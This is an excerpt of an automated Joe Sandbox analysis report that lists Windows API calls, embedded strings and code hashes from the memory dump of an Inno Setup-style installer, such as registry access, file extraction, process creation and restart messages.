                                                                                  APIs
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BF85,?,00000000,00000000,00000001,00000000,0047A939,?,00000000), ref: 0047A8FD
                                                                                  Strings
                                                                                  • Failed to parse "reg" constant, xrefs: 0047A904
                                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A771
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                  • API String ID: 3535843008-1938159461
                                                                                  • Opcode ID: 731d09dfe04126c7ce286a995487c84b6acd3a7555e11f1b87038d18dfc9fa91
                                                                                  • Instruction ID: ad7b2ad32a4e046eb061743552de15717f644d650d615c3b0b0b82a4ca8416c6
                                                                                  • Opcode Fuzzy Hash: 731d09dfe04126c7ce286a995487c84b6acd3a7555e11f1b87038d18dfc9fa91
                                                                                  • Instruction Fuzzy Hash: D78182B4E00148AFCB11EF95C481ADEBBF9AF88344F10856AE814B7391D738DE15CB99
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00000000,00483BFA,?,00000000,00483C3B,?,?,?,?,00000000,00000000,00000000,?,0046BE99), ref: 00483AA9
                                                                                  • SetActiveWindow.USER32(?,00000000,00483BFA,?,00000000,00483C3B,?,?,?,?,00000000,00000000,00000000,?,0046BE99), ref: 00483ABB
                                                                                  Strings
                                                                                  • Will not restart Windows automatically., xrefs: 00483BDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveForeground
                                                                                  • String ID: Will not restart Windows automatically.
                                                                                  • API String ID: 307657957-4169339592
                                                                                  • Opcode ID: fd112b4c8de44069fed4ab784b6429e18bede020499d5fe5eba8df49eb47ae3b
                                                                                  • Instruction ID: 00c250453c0a17a9e15f8b7c17bf5d610a6a62ae57f998986b3a61a72a87f8d4
                                                                                  • Opcode Fuzzy Hash: fd112b4c8de44069fed4ab784b6429e18bede020499d5fe5eba8df49eb47ae3b
                                                                                  • Instruction Fuzzy Hash: 79411270A04280AEDB11FF25DC56BAD7BE4AB14B09F140C7BE8405B3A3C27D7A45971E
                                                                                  APIs
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,0047691B,?,00000000,0047692C,?,00000000,00476975), ref: 004768EC
                                                                                  • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,0047691B,?,00000000,0047692C,?,00000000,00476975), ref: 00476900
                                                                                  Strings
                                                                                  • Extracting temporary file: , xrefs: 00476828
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileTime$Local
                                                                                  • String ID: Extracting temporary file:
                                                                                  • API String ID: 791338737-4171118009
                                                                                  • Opcode ID: 8bb9d3133b1fb9ec8af2f49f23ff7fadb73ae79880f698f59a04eeed571ff557
                                                                                  • Instruction ID: d70a0822c1878ba5cc3cea7231243a1bdea1af23cb32f526b41bd2dcbb3c8472
                                                                                  • Opcode Fuzzy Hash: 8bb9d3133b1fb9ec8af2f49f23ff7fadb73ae79880f698f59a04eeed571ff557
                                                                                  • Instruction Fuzzy Hash: 5D41CB70E00649AFCB01EFA5C891ADFBBB9EF09304F51847AF914A7391D7789905CB54
                                                                                  Strings
                                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 0046CE24
                                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CE38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                  • API String ID: 0-1974262853
                                                                                  • Opcode ID: bd600112513020f620d7d4569e21eaae9941e9eb8c4aa750224beaba235140ee
                                                                                  • Instruction ID: b126ef70070b574b462b5ad6e8f6b62ab94db58f07a08aa979416f05a1434e77
                                                                                  • Opcode Fuzzy Hash: bd600112513020f620d7d4569e21eaae9941e9eb8c4aa750224beaba235140ee
                                                                                  • Instruction Fuzzy Hash: 5931A2306042009FD711EB59D989BA97BF9AB05304F6500BBF448AB3A2D778AE44DB59
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(?,004793BA,?,?,00000001,00000000,00000000,004793D5), ref: 004793A3
                                                                                  Strings
                                                                                  • %s\%s_is1, xrefs: 0047934C
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047932E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                  • API String ID: 47109696-1598650737
                                                                                  • Opcode ID: 3354c75471e71dfe397ad959b7ebf057644b34f0928cd67ef0d370c48c0a0807
                                                                                  • Instruction ID: 81948899c858854939f702104da2ecae25413b277659753d1c8da10ae03f2604
                                                                                  • Opcode Fuzzy Hash: 3354c75471e71dfe397ad959b7ebf057644b34f0928cd67ef0d370c48c0a0807
                                                                                  • Instruction Fuzzy Hash: 7E216174A046446FDB11DFA9CC51AAEBBF8EB4D704F90847AE808E7381D7789D018B99
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 00450271
                                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004502A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteMessageSendShell
                                                                                  • String ID: open
                                                                                  • API String ID: 812272486-2758837156
                                                                                  • Opcode ID: 1d47999e67842d91bbdff3080109e9f99b92e08493ad044d5529b9a4f90a2308
                                                                                  • Instruction ID: 579e8a969fc791085b17213fdcb8cb543336c6f56b5ff41e9c914d75dd94f84d
                                                                                  • Opcode Fuzzy Hash: 1d47999e67842d91bbdff3080109e9f99b92e08493ad044d5529b9a4f90a2308
                                                                                  • Instruction Fuzzy Hash: 9D215174A00204AFDB04DFA5CC85B9EB7F9EB44705F2085BAB404E7292DB789E45CA48
                                                                                  APIs
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004553A0
                                                                                  • GetLastError.KERNEL32(0000003C,00000000,004553E9,?,?,00000001,00000001), ref: 004553B1
                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                  • String ID: <
                                                                                  • API String ID: 893404051-4251816714
                                                                                  • Opcode ID: afd5839f8e658dd33c6cf15c07b37cc62197e7a91b642cac2381ff1ff0064e27
                                                                                  • Instruction ID: 1baeac92009e3f48d7e72975e94fd539b808c95e86e95f0c8891d74cc8928d66
                                                                                  • Opcode Fuzzy Hash: afd5839f8e658dd33c6cf15c07b37cc62197e7a91b642cac2381ff1ff0064e27
                                                                                  • Instruction Fuzzy Hash: 51213570A04649AFDB10DF65D8926AE7BF8AF08355F90403BFC44E7381D7789E498B98
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0049C420,00000000,)), ref: 004025C7
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049C420,0040263D), ref: 00402630
                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049C420,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049C420,00401A89,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                  • String ID: )
                                                                                  • API String ID: 2227675388-1084416617
                                                                                  • Opcode ID: 94eed0a9be2c3ee170c705f4af63db45f02aa9b7064399c91cb7111f76640db2
                                                                                  • Instruction ID: 1fa17fb08616f6b4eef2bbe9ac14d29337f111a30cd6b0cffb698505e2c33406
                                                                                  • Opcode Fuzzy Hash: 94eed0a9be2c3ee170c705f4af63db45f02aa9b7064399c91cb7111f76640db2
                                                                                  • Instruction Fuzzy Hash: A21134307042006FEB10AB795F6A62A6AD4D795358B60087FF404F32D2D9BD8C02825C
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00497241
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window
                                                                                  • String ID: /INITPROCWND=$%x $@
                                                                                  • API String ID: 2353593579-4169826103
                                                                                  • Opcode ID: 5a103d45b4538b44b7d3fd145df9eaa2b16f7591657a5688a99aa9ff68a700bd
                                                                                  • Instruction ID: 05f588258c78c5b50029c9c11ed11213d1445aaa1ba567bca7741b432d444d98
                                                                                  • Opcode Fuzzy Hash: 5a103d45b4538b44b7d3fd145df9eaa2b16f7591657a5688a99aa9ff68a700bd
                                                                                  • Instruction Fuzzy Hash: A611A571A282089FDB01DBA5D851FAEBBE8EB48314F5084BBF904E7291D63C9905CB5C
                                                                                  APIs
                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                  • SysFreeString.OLEAUT32(?), ref: 0044753A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                                  • API String ID: 3952431833-1023667238
                                                                                  • Opcode ID: b5b3b2027cd9392a30aef52b357f29023a93b6cb0369269594e46825eb3d0212
                                                                                  • Instruction ID: e21740dd19ee0d3aaa7bf219fd9fa850e2e2e771d5dc584e192d83827b059975
                                                                                  • Opcode Fuzzy Hash: b5b3b2027cd9392a30aef52b357f29023a93b6cb0369269594e46825eb3d0212
                                                                                  • Instruction Fuzzy Hash: 9211E930A04204AFEB00DFA59D42A6EBBBCEB49704F51447AF500EB681DB789D00CB69
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496B40,?,00496B34,00000000,00496B1B), ref: 00496AE6
                                                                                  • CloseHandle.KERNEL32(00496B80,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496B40,?,00496B34,00000000), ref: 00496AFD
                                                                                    • Part of subcall function 004969D0: GetLastError.KERNEL32(00000000,00496A68,?,?,?,?), ref: 004969F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                                  • String ID: D
                                                                                  • API String ID: 3798668922-2746444292
                                                                                  • Opcode ID: 8c076d8b975d6b314500e760c1b31ec559303ffe873c3baf39058a33e9a74c9f
                                                                                  • Instruction ID: 4578fedeb831857a9fa7b324a6e48fa42854d3e5b1879a7f0481b0c617fb48be
                                                                                  • Opcode Fuzzy Hash: 8c076d8b975d6b314500e760c1b31ec559303ffe873c3baf39058a33e9a74c9f
                                                                                  • Instruction Fuzzy Hash: 050165B1644148AFDF00DBD6CC92F9F7BACDF49714F52407BB504E7281E6789E058619
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$EnumQuery
                                                                                  • String ID: Inno Setup: No Icons
                                                                                  • API String ID: 1576479698-2016326496
                                                                                  • Opcode ID: 8eee03c1fbfc328194d38fab97817ecd3167584576368d321fe403edd0428e5d
                                                                                  • Instruction ID: 8a75d463627faac0db3bfd1327658b2d26d196a72fd2cd26e512c66f67a8876f
                                                                                  • Opcode Fuzzy Hash: 8eee03c1fbfc328194d38fab97817ecd3167584576368d321fe403edd0428e5d
                                                                                  • Instruction Fuzzy Hash: E0012B36F5A77079F73046216D02BBB56888B82B60F68053BF940EA2C0D6589C04D36E
                                                                                  APIs
                                                                                  • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452F5D,?,?,-00000001,?), ref: 00452F37
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452F5D,?,?,-00000001,?), ref: 00452F3F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesErrorFileLast
                                                                                  • String ID: 8)H
                                                                                  • API String ID: 1799206407-3916970867
                                                                                  • Opcode ID: ce74d8d9d820f7af3c63aa287241caff3d4e0ddf2f4ddb2ef23d86c57fabe815
                                                                                  • Instruction ID: dde47f3407bff09e6a38a0e499abe30f06c7602c99efaa7623f496abef129164
                                                                                  • Opcode Fuzzy Hash: ce74d8d9d820f7af3c63aa287241caff3d4e0ddf2f4ddb2ef23d86c57fabe815
                                                                                  • Instruction Fuzzy Hash: DAF0F972A04204BBCB00DB76AD4149EF7FCDB4A721710457BFC04D3342E6B85E089598
                                                                                  APIs
                                                                                    • Part of subcall function 0045568C: GetCurrentProcess.KERNEL32(00000028), ref: 0045569B
                                                                                    • Part of subcall function 0045568C: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004556A1
                                                                                  • SetForegroundWindow.USER32(?), ref: 00497F6E
                                                                                  Strings
                                                                                  • Restarting Windows., xrefs: 00497F4B
                                                                                  • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497F99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                  • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                  • API String ID: 3179053593-4147564754
                                                                                  • Opcode ID: a5cc7a903ad3542029bb0d77cfbe7a364602ca208a9d9cbdfb1bf1aa9e376992
                                                                                  • Instruction ID: 4b66e7a5e74ecb784a5d921af265fbc31bf072fcbe68812fd41d72e60711739e
                                                                                  • Opcode Fuzzy Hash: a5cc7a903ad3542029bb0d77cfbe7a364602ca208a9d9cbdfb1bf1aa9e376992
                                                                                  • Instruction Fuzzy Hash: 1C0188706182409BEB05E765E441B9D3FD99F95309F50807BF404772D3C67D9D49872D
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,00000000,004529D9,?,-00000001,?), ref: 004529B3
                                                                                  • GetLastError.KERNEL32(00000000,00000000,004529D9,?,-00000001,?), ref: 004529BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: 8)H
                                                                                  • API String ID: 2018770650-3916970867
                                                                                  • Opcode ID: 2bffeee8909a74cd18c2d876bd05f5b8a9f89f7c78f30e1aeb97f13d0a4fc114
                                                                                  • Instruction ID: 616889b774c7d0a889357a9a25b6211c9f917d25ccf9d7241b8d0611c73475d1
                                                                                  • Opcode Fuzzy Hash: 2bffeee8909a74cd18c2d876bd05f5b8a9f89f7c78f30e1aeb97f13d0a4fc114
                                                                                  • Instruction Fuzzy Hash: 6CF0C8B1B04708ABDB00EF759D4249EB7ECDB4A315B5045B7FC04E3742E6785E148598
                                                                                  APIs
                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00452EE1,?,-00000001,00000000), ref: 00452EBB
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00452EE1,?,-00000001,00000000), ref: 00452EC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryErrorLastRemove
                                                                                  • String ID: 8)H
                                                                                  • API String ID: 377330604-3916970867
